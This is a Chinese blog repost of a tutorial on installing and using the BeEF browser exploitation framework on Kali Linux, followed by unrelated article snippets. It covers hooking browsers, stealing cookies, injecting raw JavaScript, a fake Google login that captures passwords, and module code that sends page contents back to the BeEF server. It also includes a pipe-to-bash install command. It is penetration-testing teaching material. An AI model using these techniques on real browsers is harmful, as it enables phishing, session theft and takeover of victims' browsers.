Causal_Escap
Causal_Escap

Kali Linux:了解BeEF 框架

原文链接: http://resources.infosecinstitute.com/beef-part-1/ 

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

 

       原文链接:
                       http://resources.infosecinstitute.com/beef-part-1/ 
                       http://resources.infosecinstitute.com/beef-part-2/ 

 

BeEF使用浏览器漏洞来获得目标机器的控制权。BeEF提供API,我们可以编写自己的模块来攻击目标浏览器。 
1. 安装 
1)使用root权限执行下列命令: 

Xml代码 

# apt-get install ruby1.9.1 ruby1.9.1-dev libsqlite3-dev sqlite3 sqlite3-doc rubygems1.8  
# gem install bundler  
# export PATH='$PATH:/var/lib/gems/1.8/bin'


2)使用常规权限执行: 

Xml代码 

# curl -L https://get.rvm.io | bash -s stable –ruby  
# export PATH='$PATH:/usr/local/rvm/bin/'  
# source /home/user/.rvm/scripts/rvm  
# unset RUBYOPT && sudo env-update && gem -v  


3)下载BeEF框架: 

Xml代码 

# git clone https://github.com/beefproject/beef.git  


4)要安装BeEF框架,必须使用bundle命令来安装缺少的依赖: 

Xml代码 

# cd beef/  
# bundle install  


5)成功安装依赖关系如下图: 

Xml代码 

# bundle install  
Fetching gem metadata from http://rubygems.org/.......  
Fetching gem metadata from http://rubygems.org/..  
Installing addressable (2.2.8)  
Installing ansi (1.4.3)  
Installing daemons (1.1.9)  
Installing data_objects (0.10.8)  
Installing dm-core (1.2.0)  
Installing dm-do-adapter (1.2.0)  
Installing dm-migrations (1.2.0)  
Installing do_sqlite3 (0.10.8) with native extensions  
Installing dm-sqlite-adapter (1.2.0)  
Installing eventmachine (0.12.10) with native extensions  
Installing em-websocket (0.3.8)  
Installing erubis (2.7.0)  
Installing multipart-post (1.1.5)  
Installing faraday (0.8.4)  
Installing jsmin (1.0.1)  
Installing json (1.7.5) with native extensions  
Installing librex (0.0.68)  
Installing msgpack (0.4.7) with native extensions  
Installing msfrpc-client (1.0.1)  
Installing multi_json (1.3.6)  
Installing parseconfig (1.0.2)  
Installing rack (1.4.1)  
Installing rack-protection (1.2.0)  
Installing simple_oauth (0.1.9)  
Installing tilt (1.3.3)  
Installing sinatra (1.3.2)  
Installing term-ansicolor (1.0.7)  
Installing thin (1.4.1) with native extensions  
Installing twitter (3.6.0)  
Using bundler (1.1.5)  
Your bundle is complete! Use `bundle show [gemname]` to see where a bundled gem is installed.  


6)更新BeEF框架: 

Xml代码 

# ./update-beef  

7)然后BeEF框架启动如下: 

Xml代码 

# ./beef  
[ 9:13:42][*] Browser Exploitation Framework (BeEF)  
[ 9:13:42] | Version 0.4.3.7-alpha  
[ 9:13:42] | Website http://beefproject.com  
[ 9:13:42] | Run 'beef -h' for basic help.  
[ 9:13:42] |_ Run 'git pull' to update to the latest revision.  
[ 9:13:45][*] BeEF is loading. Wait a few seconds...  
[ 9:13:53][*] 8 extensions loaded:  
[ 9:13:53] | Autoloader  
[ 9:13:53] | Events  
[ 9:13:53] | Proxy  
[ 9:13:53] | Requester  
[ 9:13:53] | Admin UI  
[ 9:13:53] | Console  
[ 9:13:53] | Demos  
[ 9:13:53] |_ XSSRays  
[ 9:13:53][*] 122 modules enabled.  
[ 9:13:53][*] 2 network interfaces were detected.  
[ 9:13:53][+] running on network interface: 127.0.0.1  
[ 9:13:53] | Hook URL: http://127.0.0.1:3000/hook.js  
[ 9:13:53] |_ UI URL: http://127.0.0.1:3000/ui/panel  
[ 9:13:53][+] running on network interface: 10.1.1.176  
[ 9:13:53] | Hook URL: http://10.1.1.2:3000/hook.js  
[ 9:13:53] |_ UI URL: http://10.1.1.2:3000/ui/panel  
[ 9:13:53][*] RESTful API key: 8f6d1d719227a0bc6b654e5682c2d73801d3cffc  
[ 9:13:53][*] HTTP Proxy: http://127.0.0.1:6789  
[ 9:13:53][*] BeEF server started (press control+c to stop)  


      我们可以看到BeEF启动/正确运行:它现在运行在所有发现的网络接口,所以可以从各个网卡访问。从BeEF输出中可以看到user接口面板可以通过http://10.1.1.2:3000/ui/panel来访问,如果我们访问该页面,我们将自动重定向到http://127.0.0.1:3000/ui/authentication,如下图所示: 
Kali Linux:了解BeEF 框架_第1张图片

 

默认username/passwd是 beef:beef,现在登录 
Kali Linux:了解BeEF 框架_第2张图片 
我们我们可以看到web页面的欢迎信息以及出现基本信息,以及使用手册。 
开始使用 
当前当前BeEF框架有两个demo页面: 
a.基本demo页面 
Kali Linux:了解BeEF 框架_第3张图片 
      当上图页面加载时,我们的浏览器已经被hook到BeEF框架中,并且我们可以利用它执行命令了。显示的额外的连接/表单是为了显示BeEF的各种特性 
b)Butcher Demo页面 
Kali Linux:了解BeEF 框架_第4张图片 
      这个例子也是用于自动hook浏览器到BeEF框架中,所以不需要额外的步骤。web页面中的其他元素也是为了演示目的。 
      在BeEF user interface面板的左侧,我们可以看到“Online Browsers” 和 “Offline Browsers,表示为已经被hook的浏览器,它们中的一些在线,另一些不在线。取决于受害者机器的状态 
我们我们也可以通过点击浏览器来与一个被hook的浏览器通信,然后会创建一个新的tab,如下图 
Kali Linux:了解BeEF 框架_第5张图片 
我们我们可以看到每一个tab代表一个浏览器,它有5个tab-总结如下: 
     •  Details     显示被hook的浏览器的细节。如上图所示 
     •  Logs      显示当前浏览器的log实体。如下图所示 
 
      commands  我们可以对一个浏览器执行模块。模块可以执行可以通过JavaScript来执行的任何命令。每一个模块有一个图标,表示为如下色彩: 
     • Green : 可以工作; user不可见 
     • Orange :可以工作; user可见 
     • Grey : 可能工作 
     • Red : 不能工作 
如下图所示,选择了“Browser – Hooked Domain – Play Sound” module. 
Kali Linux:了解BeEF 框架_第6张图片 
Rider       允许我们以被hook的浏览器身份提交任何请求 
     • XssRays    用于检测被hook的页面是否含有XSS漏洞。如果我们右击被hook的页面,弹出一个menu,有两个选项 
     • Use as Proxy    允许我们使用被hook的浏览器做代理 
     • Launch XssRays on Hooked Domain    用于发现web页面的XSS漏洞。XssRays标签用于做同样的事 
使用模块 
1. 获得cookie: 
Kali Linux:了解BeEF 框架_第7张图片 
      当我们执行Get Cookie,得到如下结果: 
Kali Linux:了解BeEF 框架_第8张图片 
2. 获得页面HREFs 
      该模块用于从目标页面中获得HREFS。如果我们查看代码,我们将会看到如下代码: 

Xml代码 

  
           
  • The Browser Exploitation Framework Project homepage
    •        
  • ha.ckers.org homepage
    •        
  • Slashdot
    •   
   
  


在html代码中有三个连接: 
      • http://beefproject.com 
      • http://ha.ckers.org/ 
      • http://slashdot.org/ 
      通过本模块,我们可以从模块中提取这些连接。如果我莫执行模块“Get Page HREFs”,我们将会得到如下响应: 
 
3. 获得页面HTML 
      该模块将会从当前页面中获得HTML。执行结果如下: 
Kali Linux:了解BeEF 框架_第9张图片 
4. 替换HREFs 
      该模块将会覆盖指定URL的HREFs属性。实验用www.google.com替换该模块。成功覆盖目标页面的所有url。响应如下所示: 
Kali Linux:了解BeEF 框架_第10张图片 
5. 创建alert对话框 
      这是第一个对于user来说非不可见的模块。该模块发送一个alert到被hook的浏览器。如下所示: 
Kali Linux:了解BeEF 框架_第11张图片 
6 Google搜索 
      该模块从被hook的浏览器来搜索Google。成功执行是如下: 
Kali Linux:了解BeEF 框架_第12张图片 
7. 原生态JavaScript 
      本模块发送输入框中的JS代码到被hook的浏览器。代码在一个匿名函数中运行,并通过框架返回结果。 
如果我们在输入框中输入alert(“Hello World!”); return ‘Ok’; ,被hook的浏览器将会显示alert窗口,如下: 
Kali Linux:了解BeEF 框架_第13张图片 
8. 检查社交网络 
      本模块检查被hook的浏览器是否在浏览Gmail,Facebook,或Twitter。当用户被授权到Facebook时响应如下: 
Kali Linux:了解BeEF 框架_第14张图片 
10. Google钓鱼 
      本模块伪造一个google登录页面,一旦登录到Gmail邮件系统,用户口令将会发送给BeEF框架。当我们点击执行按键,Gmail Google页面将会显示,如下图: 
Kali Linux:了解BeEF 框架_第15张图片 
      我们可以看到页面和Google的页面一样,除了url不同。当输入用户口令test:test时,我们将会从BeEF框架中获得该口令: 
Kali Linux:了解BeEF 框架_第16张图片 
2. 模块内部工作机制 
      模块代码位于 /beef/modules/browser/hooked_domain/get_page_html/,该文件下保存module.rb文件看起来如下: 

Ruby代码 

class Get_page_html < BeEF::Core::Command  
   
def post_execute  
   
content = {}  
   
content['head'] = @datastore['head']  
   
content['body'] = @datastore['body']  
   
save content  
   
end  
   
end  

  1. 我们创建一个叫 Get_page_html的类,继承了BeEF::Core::Command类。该文件中同时含有另外两个文件。第一个是config.yaml,如下所示,包含模块的配置信息: 

Ruby代码 

beef:  
   
module:  
   
get_page_html:  
   
enable: true  
   
category: ["Browser", "Hooked Domain"]  
   
name: "Get Page HTML"  
   
description: "This module will retrieve the HTML from the current page."  
   
authors: ["bcoles"]  
   
target:  
   
working: ["ALL"]  

  1. 我们可以看到模块叫做get_page_html,属于“Browser – Hooked Domain”类别,可以工作于所有的浏览器。第二个文件叫command.js,如下: 

Js代码 

beef.execute(function() {  
   
try {  
   
var html_head = document.head.innerHTML.toString();  
   
} catch (e) {  
   
var html_head = "Error: document has no head";  
   
}  
   
try {  
   
var html_body = document.body.innerHTML.toString();  
   
} catch (e) {  
   
var html_body = "Error: document has no body";  
   
}  
   
beef.net.send("", , 'head='+html_head+'&body='+html_body);  
   
});  


      这个是要发送到被hook的浏览器执行的代码。当代码被执行,beef.net.send函数被用于返回执行结果。 
core.rb 文件包含: 

Ruby代码 

module BeEF  
   
module Core  
   
end  
   
end  
   
# @note Includes database models - the order must be consistent otherwise DataMapper goes crazy  
   
require 'core/main/models/user'  
   
require 'core/main/models/commandmodule'  
   
require 'core/main/models/hookedbrowser'  
   
require 'core/main/models/log'  
   
require 'core/main/models/command'  
   
require 'core/main/models/result'  
   
require 'core/main/models/optioncache'  
   
require 'core/main/models/browserdetails'  
   
# @note Include the constants  
   
require 'core/main/constants/browsers'  
   
require 'core/main/constants/commandmodule'  
   
require 'core/main/constants/distributedengine'  
   
require 'core/main/constants/os'  
   
require 'core/main/constants/hardware'  
   
# @note Include core modules for beef  
   
require 'core/main/configuration'  
   
require 'core/main/command'  
   
require 'core/main/crypto'  
   
require 'core/main/logger'  
   
require 'core/main/migration'  

  1. 每个模块继承core/main/command,如下: 

Ruby代码 

# @note This class is the base class for all command modules in the framework.  
   
# Two instances of this object are created during the execution of command module.  
   
class Command  
   
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname  
   
attr_accessor :zombie, :command_id, :session_id  
   
include BeEF::Core::CommandUtils  
   
include BeEF::Core::Constants::Browsers  
   
include BeEF::Core::Constants::CommandModule  
   
end  


Command 类包含各种方法: 
   initialize:构造函数 
    • pre_send:在指令被发送到被hook的浏览器之前调用 
    • callback:当被hook的浏览器返回执行结果的时候调用 
    • process_zombie_response:处理余下的结果 
    • needs_configuration:当命令需要配置时,返回真 
    • to_json:返回JSON格式命令的信息 
    • build_datastore:创建命令的datastore属性,用来生产javascript代码 
    • build_callback_datastore:设置callback函数的datastore 
    • output:实际被发送到浏览器的指令 
    • save:保存从浏览器接收到的结果 
    • use:加载命令将会使用的一个模块 
      还有一些我们不需要了解的函数,map_file_to_url, oc_value 和 apply_defaults。当创建一个新的模块时,我们需要做如下几件事: 
a command.js 
这个文件需要实现beef.execute,它包含JavaScript代码,这些代码将会被发送到浏览器执行: 

Js代码 

beef.execute(function() {  
 /* code here */  
});  


b. config.yaml 
该文件包含当前模块的配置变量,基本文件结构如下图所示: 

Ruby代码 

beef:  
   
module:  
   
[module_name]:  
   
enable: true  
   
category: [category]  
   
name: [name]  
   
description: [description]  
   
authors: [author]  
   
target:  
   
user_notify: ['ALL']  

  1. c. module.rb 
    文件包含模块的实际代码,在这里必须创建一个新的继承自BeEF::Core::Command模块的类,并且执行我们想执行的动作,基本框架如下: 

Ruby代码 

class [module_name] < BeEF::Core::Command  
   
; code  
   
end  

我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重

 

你可能感兴趣的:(渗透测试,kali,信息收集,BeEF,学习)

  • Python深度学习(使用 LSTM 生成文本)--学习笔记(十八) 呆萌的小透明 深度学习神经网络深度学习
    第8章生成式深度学习人工智能模拟人类思维过程的可能性,并不局限于被动性任务(比如目标识别)和大多数反应性任务(比如驾驶汽车),它还包括创造性活动。的确,到目前为止,我们见到的人工智能艺术作品的水平还很低。人工智能还远远比不上人类编剧、画家和作曲家。但是,替代人类始终都不是我们要谈论的主题,人工智能不会替代我们自己的智能,而是会为我们的生活和工作带来更多的智能,即另一种类型的智能。在许多领域,特别是
  • 输入文字转化语音 李洋-蛟龙腾飞公司 HarmonyOS
    一、介绍基于鸿蒙Next模拟一个输入用户文字,转化成语音播报效果二、场景需求辅助功能:为视障人士提供帮助:将文字内容转化为语音,使视觉障碍用户能够获取信息。教育与学习:语言学习:帮助学习者通过听力学习语言,提供正确的发音。有声读物:将电子书或教材转化为有声形式,方便学习和阅读。客户服务:自动语音应答系统:在客户服务热线中,通过语音播报来解答常见问题或提供信息。智能设备:智能家居助手:例如,Goog
  • 【AIGC】ChatGPT 3.5/4.0 新手使用手册 @我们的天空 AIGCchatgptAIGCgptpromptAI写作文心一言AI编程
    欢迎大家来到我们的天空如果文章内容对您有所触动,别忘了点赞、关注,收藏!作者简介:我们的天空《头衔》:大厂高级软件测试工程师,阿里云开发者社区专家博主,CSDN人工智能领域新星创作者。《博客》:人工智能,深度学习,机器学习,python,自然语言处理,AIGC等分享。所属的专栏:TensorFlow项目开发实战,人工智能技术主页:我们的天空一、基本介绍ChatGPT是一种高级的语言模型,能够生成类
  • 6种方法:如何克服编程挫折,找到突破的学习方法 三桥君 javaandroid开发语言学习方法开发者
    你好,我是三桥君在编程学习的过程中,挫折感确实是一道难以逾越的高墙,但这也是通往成功之路的必经之路。每一位编程高手都曾在这条路上跌倒过、迷茫过,但最终他们找到了突破的方法。比如说,在Java代码中常见的语法错误情况,通过修正这些错误,代码将能够正确编译和运行。例子1:缺少分号错误代码:publicclassMain{publicstaticvoidmain(String[]args){intx=5
  • Java为枚举类创建成员变量_Java学习——枚举类 陈宇卿 Java为枚举类创建成员变量
    Java学习——枚举类摘要:本文主要介绍了Java的枚举类。部分内容来自以下博客:https://www.cnblogs.com/sister/p/4700702.htmlhttps://blog.csdn.net/zhou520yue520/article/details/80952404为什么使用枚举类枚举类更加直观,类型安全。使用常量会有以下几个缺陷:类型不安全。若一个方法中要求传入季节这个
  • 教育的最高境界,是让孩子成为平凡而幸福的人 阳灵
    现在的小孩为什么经常被苛责、被打骂、被批评?因为家长们都患上了一种病……完美小孩期待症。01大多数孩子都是普通人,我们不能把他们当天才一样要求,况且天才还有不完美的地方。昨天朋友聚餐,一位一向开朗活泼的朋友一脸愁容,郁郁寡欢。大家小心翼翼地问是不是与老公吵架了?她叹了口气说,比那严重多了,接着道出了缘由,原来是为女儿的学习发愁。朋友的女儿小月漂亮可爱,舞蹈也跳得特别好,是学校里的小明星,从幼儿园起
  • 无题 杉玲
    兴致勃勃的发了一条关于学习的朋友圈,最后被妞歧视。为什么呢,是昨天放学要求期末完了放她和同学一起出去玩,被我一口拒绝了。了解妞的人都知道,她嘴巴那是一个好口才,但是我就是:“你有你的千条计,我有的老主意”自从步入六年级以来,更为关注她。刚开始三言不和就开吵,给你们讲一下具体吵什么呢。她说:“你老说看班上的谁谁在家听话,学习又上进,成绩又那么地好。你怎么就没有看谁谁家的妈妈会做菜,会烘焙,会做各种小
  • 猫妈的家校之路(二) jiajiasoso
    猫妈很小的时候就被我父亲洗脑:学习和工作一定要离家近,越近越好。所以,我的小学在家门口的,初中和高中也在家门口的。我们家住在徐汇区,上海中学,市二中学,位育中学,南模中学,这些响当当的名字随便我挑的,我却都不知道,就是进了家门口的那所初中。没别的原因,就是近。甚至在后来找工作的时候,有一次,我去了一个叫顾路的地方面试,也被我父亲嘲笑了好久好久,直到我后来在淮海路上班了,公车三站路就到了的地方,我妈
  • 【学习升维营】Day2——《生活技巧变现的3大小妙招》 清筠
    (✿主持人问:什么是生活?1.生下来、活下去生活,我们是独立个体,我们都有自己独立思想和固定的思维模式!我们也是不独立的,我们要和别人打交道!传递价值就是一种非常好的变现如何传递价值?2.和人打交道,如何实现这样两个结果:把思想装进别人的脑袋里,把别人的钱装进自己的口袋里!(✿兴华教练我们是否随时随地可以去传递自己的价值?并且能做出传递这样价值的动作(从自我介绍开始)?科学的自由介绍,只需要一分钟
  • 偷懒一下 江湖闲散人
    乐此不疲的网络投票原先寂静的同学群里今天热闹非凡,好多截图还有红包雨,还有起哄让苹果请吃请喝的,咋回事?爬楼细瞧,奥,原来是苹果家的宝宝在书法班学习,参加作品网络评比呢!二话不说,作为孩她姨理所当然给孩投一票,至于其他作品,谁还会有时间跟心思看呢?现在随着社会的进步,家长们对教育越来越重视,把一个个小小的孩都送进了名目繁多的早教班、辅导班。各种教育机构五花八门的宣传链接、图片铺天盖地,利用家长们这
  • 编程学习方法——感悟分享 leon625 学习方法
    编程的确是一条充满挑战的道路,每个开发者都可能在这条路上遇到挫折。面对Bug的迷宫和复杂算法,以下是一些我用来克服困难的策略,希望能为你的编程之路提供帮助。1.分解问题复杂的算法和Bug往往显得难以捉摸。将问题分解成小块,然后逐一攻克每一个小块,可以让问题变得更易于管理。用这种方法你可以逐步解决问题,而不是一开始就试图解决整个问题。2.调试技巧-逐步调试:使用IDE的调试工具,逐行执行代码,观察每
  • 「RIA学习力」《心流》便签10,林子 代女士
    「A1,激活经验」请估算一下,每天你的工作产生心流的百分比,如果这样估算对你困难,那么请回想一下昨天在工作中你的心流的百分比。然后写出那些你必须要做,但又没有心流的事情,说说这件事为什么你没有心流。回想下,22天的工作日,只有在月初7天和中间分析的4天中有心流。其他的工作都是非常规整的做分配表,填表单,审批,送单。最多50%是有心流的。没有心流的工作,他们已经常态化,没有挑战,难度在掌控范围内。「
  • 功利性学习 鉴哥说事
    一,明确一个工作生活中遇到的问题二,寻找解决问题所需的书籍和材料三,有针对性的学习,边学边用框架性学习一,确定某一领域二,确定該领域范围内的书籍三,有针对性的学习迁移性学习,举一反三,有些技能可以通用,比如演讲说服技巧等。
  • 用Guitar Pro可以打开网上下载的各种吉他谱 skyprion
    吉他现下受到很多喜欢音乐的朋友们的追捧,自然吉他谱的存着就有必不可少的意义。但对于很多新手朋友来说,编曲、扒谱还有一定的难度,在各个吉他论坛网站下载学习网友们扒好的谱子是一个很不错的学习方法。有了谱子还不够,我们还需要一款软件工具来打开这些谱子,这里就不得不说到GuitarPro了,它是一款专为吉他手学习、创作、绘谱、编曲打造的一款软件,常见格式的吉他谱文件几乎都能兼容打开。下面我们就看看Guit
  • 2019-2-22 DD_e848
    坚持:上课前闭眼静息1分钟。开学这两天,感触最深的就是李霖浩的变化。原来他是从来不主动学习的学生,这次来了之后,他能主动的在书上记笔记。让我很震惊。跟他谈话中得知,寒假一直有人给他补习,所以,学习态度变化很大。今天早上早读,他走到讲桌前问我:“老师,这个字怎么读?”出乎我意料的是,他的基础竟然这么差,我一遍遍地教他。30分钟,终于能够独立把第一段2行的课文读下来了。早读即将结束,抽查班级内背诵,最
  • javascript学习笔记--for 循环练习 持续5年输出bug
    题目:打印1-10之间所有的7的倍数的个数总和首先做到控制台打印1-100之间的数:for(vari=1ivarsum=0;varcount=0;for(vari=1;i效果如图:22.png
  • 2018.7.9北京学第一场 咋咋咋了
    经过爬山涉水来到了北京,迎接我们第一场学习之旅是何桂香老师的优化半日教学活动。图片发自App在几个小时的讲座,何老师的每个主题讲座都提出了老师们最常出现的问题,这是平时老师们易忽略但又很重要的问题,建议大家在开展活动前期一定要注意避免这些问题,同时活动后反思自己是都出现了这样的问题,一定要及时的改正。如下图1环境与材料问题;图2生活活动主要问题;图3游戏活动主要,图4户外活动主要问题;图5半日活动
  • 2021-08-01 yqq32
    转载自https://blog.csdn.net/yy150122/article/details/106146414Linux从零开始学习笔记从零开始学习Linux,记录笔记,担心自己以后会忘,也供大家茶余饭后,闲来无事看看,自己的理解只能到这,能力有限。Linux学习笔记第一章Linux起源第二章系统分区第三章Linux安装与配置第四章Linux常用命令第一节文件处理命令第一讲命令格式与目录处
  • Qt/QML学习-Drawer 放假当宅宅 Qt/QML学习qt学习
    QML学习Drawer例程视频讲解代码main.qmlimportQtQuick2.15importQtQuick.Window2.15importQtQuick.Controls2.15Window{width:640height:480visible:truetitle:qsTr("Drawer")Drawer{id:drawerwidth:parent.width/4height:paren
  • 【打卡-1】日语学习打卡的第一天,希望自己可以变得更自律 无糖面包
    放图,不是很工整,希望大家可以忽略我的字,不过,如果不看字好像也没什么了,哈哈哈哈哈哈哈哈哈今年高二了,感觉时间过的好快啊,就是刷的一下就过去了,然后我还懵懵懂懂上周被我哥说了一顿,问我到底想干什么?想做什么?想考什么大学?想读什么专业?不知道,不知道,不知道,只知道的是我想读好大学,想像书本里写的那样度过那四年我哥说我做梦(真的不能在真实的哥哥了)“你说英语学不好,想用日语高考也顺了你,你的日语
  • 2021-11-22 不吃香菜的叙小叙
    坚持日更万事都要全力以赴做事都要自己努力去做,幸福也一样,努力追求,努力了,付出了,即使没有收获也不曾后悔,后悔当初的不努力。工作的时候就要努力工作,学习的时候就要努力学习,玩的时候就要努力玩,吃饭的时候就吃饭,睡觉的时候就睡觉,万事都要全力以赴。每天反思一下,今天做事是否努力地去做了,是否尽最大努力去把事情做成,如果是的,那今天就是很棒的一天,因为你努力地活了。全力以赴并不代表着用力过猛,虽然有
  • 还在为孩子的启蒙教育发愁吗? 哇塞火火的姑娘
    “妈妈,今天上学老师又表扬我画的画好了!”“是吗!是不是很开心啊!”“是的,我回家要学画画去喽~”回到家后的孩子,马上拿出画材,打开美术教程,就开始学习了,还认真的告诉我,“妈妈,我画画,你做饭哦,一会给你看看我今天的画!”只有几岁的宝,直到今天能够形成很好的画画乐趣,还要说说一年前的启蒙经历。在孩子还对画画没有概念的时候,最喜欢做的事就是拿着妈妈的笔在空白的纸上各种涂鸦,不管怎么样的涂鸦,形态一
  • 党建引领、决战决胜脱贫攻坚 他叫夏天_6082
    发挥“关键少数”作用,为民支起“顶梁柱”。欲治兵者,必先选将。置将不善,一败涂地。“脱贫攻坚战不是轻轻松松一冲锋就能打赢的,必须高度重视面临的困难挑战”,当前又遇新冠肺炎疫情的挑战,组织部门要加强对各级领导班子、领导干部的使用和管理,使其发挥好“顶梁柱”的作用,冲在一线、英勇奋斗。各级领导干部,特别是脱贫攻坚一线的领导干部,要加强学习,深刻理解习近平总书记在决战决胜脱贫攻坚座谈会上的讲话精神,增强
  • 7天有效阅读营DAY6 楚正军
    2020年12月05日星期六阴如何成为真正的学习高手第1定律:把学习的知识转化为价值,为帮助别人解决问题的问题同行思维,向顶级的同行学习,研究同行,寻找规律有销售高手一个小区销售保险几个亿?怎么做到的?能给你什么启发反思自己学习系统的建立?第2定律:行动力,需要超强的行动力,如果没有,借助外力,提升自己的行动力资源整合变现商业模式的课程第3定律:要让自己享受喜欢被碾压的感觉,投资个人品牌第4定律:
  • 学习日志6 Simon#0209 学习
    关于量子强化学习:论文Variational_Quantum_Circuits_for_Deep_Reinforcement_Learning:变分量子电路在深度强化学习中的应用论文主要内容:将经典深度强化学习算法(如经验重放和目标网络)重塑为变分量子电路的表示摘要当前最先进的机器学习方法基于经典冯·诺伊曼计算架构,并在许多工业和学术领域得到广泛应用。随着量子计算的发展,研究人员和技术巨头们试图为
  • STM32学习日志 2020/10/29 曾经有个曾 学习历程stm32
    STM32学习日志2020/10/29写在前面part1part2学习目标:学习内容:学习时间:学习产出:技术文档:第一课学习其他学习思路今日复盘写在前面博主今年大二,电赛降至,自己的电子设计领域知识极其匮乏,又甚是想去参加电赛,同时记录下自己学习经历,方便自我回顾和帮后来者踩坑。part1第一次正经写博客,想到哪写到哪,希望各位不要见怪。写作动机:除了记录学习经历之外,另外一个就是自我督促。我一
  • ESP32学习笔记03-日志打印 Car12 ESP32日志打印ESP_LOGIESP_LOGE
    ESP32日志日志分为5个等级ESP_LOGE-error(lowest)ESP_LOGW-warningESP_LOGI-infoESP_LOGD-debugESP_LOGV-verbose(highest)API0.头文件#</
  • 2021-3-28晨间日记 废物宝贝
    今天是什么日子起床:就寝:天气:心情:纪念日:任务清单昨日完成的任务,最重要的三件事:改进:习惯养成:周目标·完成进度学习·信息·阅读健康·饮食·锻炼人际·家人·朋友工作·思考最美好的三件事1.2.3.思考·创意·未来花、风、娃共舞春吾(中国现代)一树桃杈俏;万枝红云娇;轻风拂过飘;随花起舞摇。
  • 使用Python和大模型进行数据分析和文本生成 lizi88888 python数据分析人工智能
    如何使用Python和大模型进行数据分析和文本生成Python语言以其简洁和强大的特性,成为了数据科学、机器学习和人工智能开发的首选语言之一。随着大模型(LargeLanguageModels,LLMs)如GPT-4的崛起,我们能够利用这些模型实现诸多复杂任务,从文本生成到智能对话、数据分析等等。在这篇文章中,我将介绍如何用Python连接和使用大模型,并通过示例展示如何在实际项目中应用这些技术。
  • 福禄贝尔 一人幽梦
    图片发自App图片发自App图片发自App图片发自App在日本的活动出版的文学作品图片发自App福禄贝尔认为玩是孩子的天性,认为我们应该通过玩鼓励孩子激励孩子去学习。在福禄贝尔小的时候,并没有这样的幼儿园去获得系统的教育,出生的孩子只是与其他的小动物不同,但在那个年代,都只可能尽量的去学习获得更多能适应社会的准备。后期我们发现,有些机构为当妈妈的人提供支持,如中世纪的德国,就会有帮助父母去照顾孩子
  • 辗转相处求最大公约数 沐刃青蛟 C++漏洞
    无言面对”江东父老“了,接触编程一年了,今天发现还不会辗转相除法求最大公约数。惭愧惭愧!   为此,总结一下以方便日后忘了好查找。   1.输入要比较的两个数a,b   忽略:2.比较大小(因为后面要的是大的数对小的数做%操作)   3.辗转相除(用循环不停的取余,如a%b,直至b=0)   4.最后的a为两数的最大公约数 &
  • F5负载均衡会话保持技术及原理技术白皮书 bijian1013 F5负载均衡
    一.什么是会话保持?        在大多数电子商务的应用系统或者需要进行用户身份认证的在线系统中,一个客户与服务器经常经过好几次的交互过程才能完成一笔交易或者是一个请求的完成。由于这几次交互过程是密切相关的,服务器在进行这些交互过程的某一个交互步骤时,往往需要了解上一次交互过程的处理结果,或者上几步的交互过程结果,服务器进行下
  • Object.equals方法:重载还是覆盖 Cwind javagenericsoverrideoverload
    本文译自StackOverflow上对此问题的讨论。 原问题链接   在阅读Joshua Bloch的《Effective Java(第二版)》第8条“覆盖equals时请遵守通用约定”时对如下论述有疑问: “不要将equals声明中的Object对象替换为其他的类型。程序员编写出下面这样的equals方法并不鲜见,这会使程序员花上数个小时都搞不清它为什么不能正常工作:” pu
  • 初始线程 15700786134
          暑假学习的第一课是讲线程,任务是是界面上的一条线运动起来。            既然是在界面上,那必定得先有一个界面,所以第一步就是,自己的类继承JAVA中的JFrame,在新建的类中写一个界面,代码如下: public class ShapeFr
  • Linux的tcpdump 被触发 tcpdump
    用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支 持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 实用命令实例 默认启动 tcpdump 普通情况下,直
  • 安卓程序listview优化后还是卡顿 肆无忌惮_ ListView
    最近用eclipse开发一个安卓app,listview使用baseadapter,里面有一个ImageView和两个TextView。使用了Holder内部类进行优化了还是很卡顿。后来发现是图片资源的问题。把一张分辨率高的图片放在了drawable-mdpi文件夹下,当我在每个item中显示,他都要进行缩放,导致很卡顿。解决办法是把这个高分辨率图片放到drawable-xxhdpi下。 &nb
  • 扩展easyUI tab控件,添加加载遮罩效果 知了ing jquery
    (function () { $.extend($.fn.tabs.methods, { //显示遮罩 loading: function (jq, msg) { return jq.each(function () { var panel = $(this).tabs(&
  • gradle上传jar到nexus 矮蛋蛋 gradle
    原文地址: https://docs.gradle.org/current/userguide/maven_plugin.html configurations {     deployerJars } dependencies {     deployerJars "org.apache.maven.wagon
  • 千万条数据外网导入数据库的解决方案。 alleni123 sqlmysql
    从某网上爬了数千万的数据,存在文本中。 然后要导入mysql数据库。 悲剧的是数据库和我存数据的服务器不在一个内网里面。。 ping了一下, 19ms的延迟。 于是下面的代码是没用的。 ps = con.prepareStatement(sql); ps.setString(1, info.getYear())............; ps.exec
  • JAVA IO InputStreamReader和OutputStreamReader 百合不是茶 JAVA.io操作 字符流
    这是第三篇关于java.io的文章了,从开始对io的不了解-->熟悉--->模糊,是这几天来对文件操作中最大的感受,本来自己认为的熟悉了的,刚刚在回想起前面学的好像又不是很清晰了,模糊对我现在或许是最好的鼓励 我会更加的去学 加油!: JAVA的API提供了另外一种数据保存途径,使用字符流来保存的,字符流只能保存字符形式的流   字节流和字符的难点:a,怎么将读到的数据
  • MO、MT解读 bijian1013 GSM
    MO= Mobile originate,上行,即用户上发给SP的信息。MT= Mobile Terminate,下行,即SP端下发给用户的信息; 上行:mo提交短信到短信中心下行:mt短信中心向特定的用户转发短信,你的短信是这样的,你所提交的短信,投递的地址是短信中心。短信中心收到你的短信后,存储转发,转发的时候就会根据你填写的接收方号码寻找路由,下发。在彩信领域是一样的道理。下行业务:由SP
  • 五个JavaScript基础问题 bijian1013 JavaScriptcallapplythisHoisting
    下面是五个关于前端相关的基础问题,但却很能体现JavaScript的基本功底。 问题1:Scope作用范围 考虑下面的代码:  (function() { var a = b = 5; })(); console.log(b); 什么会被打印在控制台上?  回答:         上面的代码会打印 5。 &nbs
  • 【Thrift二】Thrift Hello World bit1129 Hello world
    本篇,不考虑细节问题和为什么,先照葫芦画瓢写一个Thrift版本的Hello World,了解Thrift RPC服务开发的基本流程   1. 在Intellij中创建一个Maven模块,加入对Thrift的依赖,同时还要加上slf4j依赖,如果不加slf4j依赖,在后面启动Thrift Server时会报错 <dependency>
  • 【Avro一】Avro入门 bit1129 入门
